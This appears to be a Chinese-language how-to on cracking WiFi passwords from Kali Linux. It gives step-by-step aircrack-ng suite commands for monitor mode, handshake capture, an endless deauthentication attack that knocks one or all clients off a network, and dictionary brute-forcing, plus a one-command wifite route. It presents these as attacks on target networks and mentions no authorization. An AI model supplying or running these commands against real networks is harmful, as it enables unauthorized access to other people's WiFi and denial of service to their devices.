airmon-ng、wifite工具破解WiFi密码

Kali抓WiFi握手包,所需工具:Kali Linux系统、免驱动的无线网卡。

airmon-ng:

需要用到的命令:

1.airmon-ng		#用于查看网卡是否支持监听
2.airmon-ng start 网卡名	#用于开启网卡监听
3.airodump-ng 网卡名	#用于扫描附近的WiFi网络
4.airodump-ng --bssid WiFi的BSSID -c 信道 -w 握手包存储路径 网卡名	#用于抓取握手包
5.aireplay-ng -0 0 -a WiFi的BSSID -c 连接到WiFi的mac地址 网卡名		#用于攻击已连接设备,使其掉线
6.aircrack-ng -w 密码字典 握手包路径					#用于扫描附近的WiFi网络用于进行字典爆破破解WiFi密码


示例:
ifconfig
airmon-ng
airmon-ng start wlan0
airmon-ng
airodump-ng wlan0
airodump-ng --bssid 1A:98:15:C1:BC:BE -c 6 -w /home/kali/桌面/test wlan0
aireplay-ng -0 0 -a 1A:98:15:C1:BC:BE wlan0

杀死可能对网络通信抓包造成影响的进程
airmon-ng check kill

 

Deauth 断网攻击:

1. 先杀掉会跳信道的后台进程(必做)
sudo airmon-ng check kill

2. 把网卡 wlan0 固定到目标 AP 信道 1
sudo iwconfig wlan0 channel 1
使用 iwconfig wlan0 命令查看 Channel 是否变成 1

3. 新开终端窗口,保持 airodump 锁定信道(防止网卡乱跳信道,这个窗口不要关!)
sudo airodump-ng -c 1 --bssid AE:92:65:04:2E:D2 wlan0

4. 另开终端,执行持续踢命令
aireplay-ng -0 0 -a AE:92:65:04:2E:D2 wlan0
- -0 0:无限持续发送解除认证包
- -a:路由器 BSSID
- -c:指定只踢这一台设备,不加 -c 就是全网所有客户端
- wlan0:你的网卡

 

wifite:

只需要输入wifite开始执行,然后根据提示输入我们要攻击的WiFi编号,剩下的全自动完成。